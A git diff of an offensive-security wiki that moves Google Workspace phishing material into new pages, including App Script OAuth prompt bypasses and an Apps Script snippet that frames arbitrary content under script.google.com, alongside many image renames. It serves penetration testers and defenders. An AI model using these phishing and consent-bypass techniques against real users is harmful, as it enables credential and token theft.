diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
new file mode 100644
index 0000000000..d7961cab39
Binary files /dev/null and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index d7961cab39..ece9585b82 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index ece9585b82..3048b65efa 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index 3048b65efa..fb52dbc6cd 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index fb52dbc6cd..ce50798209 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index ce50798209..fb5aa4f77c 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index fb5aa4f77c..0f269bd025 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index 0f269bd025..66bce84492 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index 66bce84492..cf55c03e28 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index cf55c03e28..7e59066fb8 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index 7e59066fb8..a66b921a15 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index a66b921a15..6e6b14ecd4 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png
index 6e6b14ecd4..67281e0416 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png
index 67281e0416..0b02740595 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png
index 0b02740595..f6d47edde9 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1).png
index f6d47edde9..e521aaf21b 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1).png
index e521aaf21b..9484a40cb8 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1).png
index 9484a40cb8..08abbbefe3 100644
Binary files a/.gitbook/assets/image (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1).png b/.gitbook/assets/image (1) (1).png
index 08abbbefe3..ffcaa54f40 100644
Binary files a/.gitbook/assets/image (1) (1).png and b/.gitbook/assets/image (1) (1).png differ
diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png
index ffcaa54f40..bf87460b34 100644
Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ
diff --git a/.gitbook/assets/image (145).png b/.gitbook/assets/image (145).png
new file mode 100644
index 0000000000..b3920360d3
Binary files /dev/null and b/.gitbook/assets/image (145).png differ
diff --git a/.gitbook/assets/image (146).png b/.gitbook/assets/image (146).png
new file mode 100644
index 0000000000..0c5f0ae7e0
Binary files /dev/null and b/.gitbook/assets/image (146).png differ
diff --git a/.gitbook/assets/image (147).png b/.gitbook/assets/image (147).png
new file mode 100644
index 0000000000..74939c8ad6
Binary files /dev/null and b/.gitbook/assets/image (147).png differ
diff --git a/.gitbook/assets/image (148).png b/.gitbook/assets/image (148).png
new file mode 100644
index 0000000000..09aa87e562
Binary files /dev/null and b/.gitbook/assets/image (148).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
index bf87460b34..e363ea97e9 100644
Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ
diff --git a/SUMMARY.md b/SUMMARY.md
index 5c668732e9..5f81bb1685 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -174,7 +174,8 @@
* [GWS - Workspace Pentesting](pentesting-cloud/workspace-security/README.md)
* [GWS - Post Exploitation](pentesting-cloud/workspace-security/gws-post-exploitation.md)
* [GWS - Persistence](pentesting-cloud/workspace-security/gws-persistence.md)
- * [GWS - Google Platforms Phishing](pentesting-cloud/workspace-security/gws-google-platforms-phishing.md)
+ * [GWS - Google Platforms Phishing](pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md)
+ * [GWS - App Scripts](pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md)
* [AWS Pentesting](pentesting-cloud/aws-security/README.md)
* [AWS - Basic Information](pentesting-cloud/aws-security/aws-basic-information/README.md)
* [AWS - Federation Abuse](pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md)
diff --git a/pentesting-ci-cd/okta-security/README.md b/pentesting-ci-cd/okta-security/README.md
index ba990bcb23..b444e72c34 100644
--- a/pentesting-ci-cd/okta-security/README.md
+++ b/pentesting-ci-cd/okta-security/README.md
@@ -64,11 +64,11 @@ getST.py -spn HTTP/clientname.kerberos.okta.com -dc-ip 1.2.3.4 LAB/comprommisedu
With a ticket retrieved for the AD user, we need to inject this on a host we control using Rubeus or Mimikatz:
-
+
You’ll need to make sure that `clientname.kerberos.okta.com` is added to the “Intranet” security zone in Internet Options. And then, in our browser, if we hit the below URL, we should find that we receive a JSON response providing an `OK` result when the Kerberos ticket is accepted:
-
+
Heading over to the Okta dashboard, if everything is OK, you’ll be signed in.
diff --git a/pentesting-ci-cd/travisci-security/README.md b/pentesting-ci-cd/travisci-security/README.md
index 6140d853dc..af57464ee8 100644
--- a/pentesting-ci-cd/travisci-security/README.md
+++ b/pentesting-ci-cd/travisci-security/README.md
@@ -44,7 +44,7 @@ It looks like It's not possible to set crons inside the `.travis.yml` according
TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets:
-![](<../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
+![](<../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
### Dumping Secrets
diff --git a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md
index a257d4054c..08a6f1ef5f 100644
--- a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md
+++ b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md
@@ -106,7 +106,7 @@ aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**.
{% endhint %}
-
+
### Generic KMS Ransomware
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
index 0108c77f85..ef0890c8ad 100644
--- a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
@@ -62,7 +62,7 @@ Note that ECR requires that users have **permission** to make calls to the **`ec
It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry.
-
+
First, you need to give the external account access over the registry with a **registry policy** like:
diff --git a/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md b/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
index e7d8584432..e86caaca7f 100644
--- a/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
+++ b/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
@@ -277,7 +277,7 @@ It's possible to generate API keys in the API Gateway portal and even set how mu
To make an API key work, you need to add it to a **Usage Plan**, this usage plan mus be added to the **API Stage** and the associated API stage needs to have a configured a **method throttling** to the **endpoint** requiring the API key:
-
+
## Unauthenticated Access
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
index 15ce95982a..0a9119ce95 100644
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
@@ -46,7 +46,7 @@ The “upgrade” from normal refresh token to primary refresh token is not poss
If there is a policy that requires MFA to sign in, we can instead use the `interactiveauth` module:
-
+
The resulting refresh token (which is cached in the `.roadtools_auth` file) can be used to request a token for the device registration service, where we can create the device:
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md
index e3504670cb..ff6cfe85dc 100644
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md
@@ -113,7 +113,7 @@ Tokens were written to .roadtools_auth
There’s also other options you can use to specify other resources or the correct redirect URL for the app you are using:
-
+
## Selenium based Azure AD authentication
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
index 57166e9c20..5f97c4f47a 100644
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
@@ -43,7 +43,7 @@ The database is located in `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync
It's possible to extract the configuration from one of the tables, being one encrypted:
-
+
The **encrypted configuration** is encrypted with **DPAPI** and it contains the **passwords of the `MSOL_*`** user in on-prem AD and the password of **Sync\_\*** in AzureAD. Therefore, compromising these it's possible to privesc to the AD and to AzureAD.
diff --git a/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md b/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
index 43da045db2..8af7ea7e42 100644
--- a/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
+++ b/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
@@ -213,7 +213,7 @@ az network vnet subnet list --resource-group --vnet-name
+
**Service Endpoints:**
diff --git a/pentesting-cloud/gcp-pentesting/gcp-services/gcp-cloud-build-enum.md b/pentesting-cloud/gcp-pentesting/gcp-services/gcp-cloud-build-enum.md
index 27d4fd684d..8225bfc337 100644
--- a/pentesting-cloud/gcp-pentesting/gcp-services/gcp-cloud-build-enum.md
+++ b/pentesting-cloud/gcp-pentesting/gcp-services/gcp-cloud-build-enum.md
@@ -70,7 +70,7 @@ Once a connection is generated, you can use it to **link repositories that the G
This option is available through the button:
-
+
{% hint style="success" %}
Note that repositories connected with this method are **only available in Triggers using 2nd generation.**
diff --git a/pentesting-cloud/gcp-security/gcp-basic-information.md b/pentesting-cloud/gcp-security/gcp-basic-information.md
index 3dccadc85b..79c0f44e85 100644
--- a/pentesting-cloud/gcp-security/gcp-basic-information.md
+++ b/pentesting-cloud/gcp-security/gcp-basic-information.md
@@ -168,7 +168,7 @@ When an organisation is created several groups are **strongly suggested to be cr
* No expiration
* If people is accessing Workspace through a third party provider, these requirements aren't applied.
-
+
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
index 489751276f..edb0d910db 100644
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
@@ -60,7 +60,7 @@ Note that the **first time a GCP action is performed in Cloud Shell that require
This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session.
{% endhint %}
-
+
However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**:
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
index 33ec51eb98..83469e2296 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
@@ -78,8 +78,8 @@ gcloud services api-keys undelete
Check the following page to learn how to do this, although this action belongs to the service **`clientauthconfig`** [according to the docs](https://cloud.google.com/iap/docs/programmatic-oauth-clients#before-you-begin):
-{% content-ref url="../../workspace-security/gws-google-platforms-phishing.md" %}
-[gws-google-platforms-phishing.md](../../workspace-security/gws-google-platforms-phishing.md)
+{% content-ref url="../../workspace-security/gws-google-platforms-phishing/" %}
+[gws-google-platforms-phishing](../../workspace-security/gws-google-platforms-phishing/)
{% endcontent-ref %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md
index b8e01892d9..7c285a56e4 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md
@@ -35,7 +35,7 @@ Key features of Google Cloud SQL include:
In the web console Cloud SQL allows the user to **set** the **password** of the database, there also a generate feature, but most importantly, **MySQL** allows to **leave an empty password and all of them allows to set as password just the char "a":**
-
+
It's also possible to configure a password policy requiring **length**, **complexity**, **disabling reuse** and **disabling username in password**. All are disabled by default.
@@ -56,7 +56,7 @@ By default a Google-managed encryption key is used, but it's also **possible to
* **Authorized networks**: Indicate public **IP ranges that should be allowed** to connect to the database
* **Private Path**: If the DB is connected in some VPC, it's possible to enable this option and give **other GCP services like BigQuery access over it**
-
+
### Data Protection
diff --git a/pentesting-cloud/workspace-security/README.md b/pentesting-cloud/workspace-security/README.md
index b8181eef7a..6ad54435b1 100644
--- a/pentesting-cloud/workspace-security/README.md
+++ b/pentesting-cloud/workspace-security/README.md
@@ -14,55 +14,20 @@ Other ways to support HackTricks:
-## Google Platforms and OAuth Apps Phishing
+## Entry Points
+
+### Google Platforms and OAuth Apps Phishing
Check how you could use different Google platforms such as Drive, Chat, Groups... to send the victim a phishing link and how to perform a Google OAuth Phishing in:
-{% content-ref url="gws-google-platforms-phishing.md" %}
-[gws-google-platforms-phishing.md](gws-google-platforms-phishing.md)
+{% content-ref url="gws-google-platforms-phishing/" %}
+[gws-google-platforms-phishing](gws-google-platforms-phishing/)
{% endcontent-ref %}
-## Password Spraying
+### Password Spraying
In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you could use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) (although it looks unmaintained) which will use AWS lambdas to change IP address.
-## App Scripts
-
-Developers can create App Scripts and set them as a standalone project or bound them to Google Docs/Sheets/Slides/Forms. App Scripts is code that will be triggered when a user with editor permission access the doc (and after accepting the OAuth prompt)
-
-However, even if the app isn't verified there are a couple of ways to not show that prompt:
-
-* If the publisher of the app is in the same Workspace as the user accessing it
-* If the script is in a drive of the user
-
-### Copy Document Unverified Prompt Bypass
-
-When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
-If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document.**
-
-{% hint style="warning" %}
-If someone creates a **copy** of that **document** that **contained the App Script**, he will also be **copying the App Script**, therefore when he **opens** the copied **spreadsheet**, the **regular OAuth prompt** will appear **bypassing the unverified prompt**, because **the user is now the author of the App Script of the copied file**.
-{% endhint %}
-
-This method will also be able to bypass the Workspace admin restriction:
-
-But can be prevented with:
-
-### Shared Document Unverified Prompt Bypass
-
-Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**.
-
-{% hint style="warning" %}
-This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it.
-
-This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document.
-{% endhint %}
-
-{% hint style="danger" %}
-This also means that if an **App Script already existed** and people have **granted access**, anyone with **Editor** permission on the doc can **modify it and abuse that access.**\
-To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags.
-{% endhint %}
-
## Post-Exploitation
If you have compromised some credentials or the session of the user you can perform several actions to access potential sensitive information of the user and to try to escala privileges:
@@ -96,6 +61,7 @@ If you have compromised some credentials or the session of the user check these
* Remove email forwarders
* Remove emails filters
* Remove recovery email/phones
+* Removed malicious synced smartphones
* Remove bad Android Apps
* Remove bad account delegations
diff --git a/pentesting-cloud/workspace-security/gws-google-platforms-phishing.md b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
similarity index 81%
rename from pentesting-cloud/workspace-security/gws-google-platforms-phishing.md
rename to pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
index db6c5fc7e4..ea990d81e7 100644
--- a/pentesting-cloud/workspace-security/gws-google-platforms-phishing.md
+++ b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
@@ -24,13 +24,13 @@ Apparently, by default, in workspace members [**can create groups**](https://gro
It's also possible to set the **FROM** address as the **Google group email** to send **more emails to the users inside the group**, like in the following image where the group **`google--support@googlegroups.com`** was created and an **email was sent to all the members** of the group (that were added without any consent)
-
+
## Google Chat Phishing
You might be able to either **start a chat** with a person just having their email address or send an **invitation to talk**. Moreover, it's possible to **create a Space** that can have any name (e.g. "Google Support") and **invite** members to it. If they accept they might think that they are talking to Google Support:
-
+
{% hint style="success" %}
**In my testing however the invited members didn't even receive an invitation.**
@@ -43,7 +43,7 @@ You can check how this worked in the past in: [https://www.youtube.com/watch?v=K
In the past it was possible to create an **apparently legitimate document** and the in a comment **mention some email (like @user@gmail.com)**. Google **sent an email to that email address** notifying that they were mentioned in the document.\
Nowadays, this doesn't work but if you **give the victim email access to the document** Google will send an email indicating so. This is the message that appears when you mention someone:
-
+
{% hint style="success" %}
Victims might have protection mechanism that doesn't allow that emails indicating that an external document was shared with them reach their email.
@@ -55,7 +55,7 @@ You can **create a calendar event** and add as many email address of the company
This is the alert that will appear in the browser with a meeting title "Firing People", so you could set a more phishing like title (and even change the name associated with your email).
-
+
To make it look less suspicious:
@@ -63,6 +63,36 @@ To make it look less suspicious:
* Do **NOT send emails notifying about the event**. Then, the people will only see their warning about a meeting in 5mins and that they need to read that link.
* Apparently using the API you can set to **True** that **people** have **accepted** the event and even create **comments on their behalf**.
+## App Scripts Redirect Phishing
+
+It's possible to create a script in [https://script.google.com/](https://script.google.com/) and **expose it as a web application accessible by everyone** that will use the legit domain **`script.google.com`**. \
+The with some code like the following an attacker could make the script load arbitrary content in this page without stop accessing the domain:
+
+{% code overflow="wrap" %}
+```javascript
+function doGet() {
+ return HtmlService.createHtmlOutput('')
+ .setXFrameOptionsMode(HtmlService.XFrameOptionsMode.ALLOWALL);
+}
+```
+{% endcode %}
+
+For example accessing [https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH\_ZscKQTJDC/exec](https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH\_ZscKQTJDC/exec) you will see:
+
+
+
+{% hint style="success" %}
+Note that a warning will appear as the content is loaded inside an iframe.
+{% endhint %}
+
+## App Scripts OAuth Phishing
+
+It's possible to create App Scripts attached to documents to try to get access over a victims OAuth token, for more information check:
+
+{% content-ref url="gws-app-scripts.md" %}
+[gws-app-scripts.md](gws-app-scripts.md)
+{% endcontent-ref %}
+
## OAuth Apps Phishing
Any of the previous techniques might be used to make the user access a **Google OAuth application** that will **request** the user some **access**. If the user **trusts** the **source** he might **trust** the **application** (even if it's asking for high privileged permissions).
@@ -126,20 +156,20 @@ python3 app.py --client-id "" --client-secret ""
Go to **`http://localhost:8000`** click on the Login with Google button, you will be **prompted** with a message like this one:
-
+
The application will show the **access and refresh token** than can be easily used. For more information about **how to use these tokens check**:
-{% content-ref url="../gcp-security/gcp-persistence/gcp-non-svc-persistance.md" %}
-[gcp-non-svc-persistance.md](../gcp-security/gcp-persistence/gcp-non-svc-persistance.md)
+{% content-ref url="../../gcp-security/gcp-persistence/gcp-non-svc-persistance.md" %}
+[gcp-non-svc-persistance.md](../../gcp-security/gcp-persistence/gcp-non-svc-persistance.md)
{% endcontent-ref %}
#### Using `glcoud`
It's possible to do something using gcloud instead of the web console, check:
-{% content-ref url="../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md" %}
-[gcp-clientauthconfig-privesc.md](../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md)
+{% content-ref url="../../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md" %}
+[gcp-clientauthconfig-privesc.md](../../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md)
{% endcontent-ref %}
## References
diff --git a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md
new file mode 100644
index 0000000000..5666c3a8d7
--- /dev/null
+++ b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md
@@ -0,0 +1,280 @@
+# GWS - App Scripts
+
+
+
+Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+
+## App Scripts
+
+App Scripts is **code that will be triggered when a user with editor permission access the doc the App Script is linked with** and after **accepting the OAuth prompt**.\
+They can also be set to be **executed every certain time** by the owner of the App Script (Persistence).
+
+### Create App Script
+
+There are several ways to create an App Script, although the most common ones are f**rom a Google Document (of any type)** and as a **standalone project**:
+
+
+
+Create a container-bound project from Google Docs, Sheets, or Slides
+
+1. Open a Docs document, a Sheets spreadsheet, or Slides presentation.
+2. Click **Extensions** > **Google Apps Script**.
+3. In the script editor, click **Untitled project**.
+4. Give your project a name and click **Rename**.
+
+
+
+
+
+Create a standalone project
+
+To create a standalone project from Apps Script:
+
+1. Go to [`script.google.com`](https://script.google.com/).
+2. Click add **New Project**.
+3. In the script editor, click **Untitled project**.
+4. Give your project a name and click **Rename**.
+
+
+
+
+
+Create a standalone project from Google Drive
+
+1. Open [Google Drive](https://drive.google.com/).
+2. Click **New** > **More** > **Google Apps Script**.
+
+
+
+
+
+Create a container-bound project from Google Forms
+
+1. Open a form in Google Forms.
+2. Click More more\_vert > **Script editor**.
+3. In the script editor, click **Untitled project**.
+4. Give your project a name and click **Rename**.
+
+
+
+
+
+Create a standalone project using the clasp command line tool
+
+`clasp` is a command line tool that allows you create, pull/push, and deploy Apps Script projects from a terminal.
+
+See the [Command Line Interface using `clasp` guide](https://developers.google.com/apps-script/guides/clasp) for more details.
+
+
+
+## App Script Scenario
+
+### Create Google Sheet with App Script
+
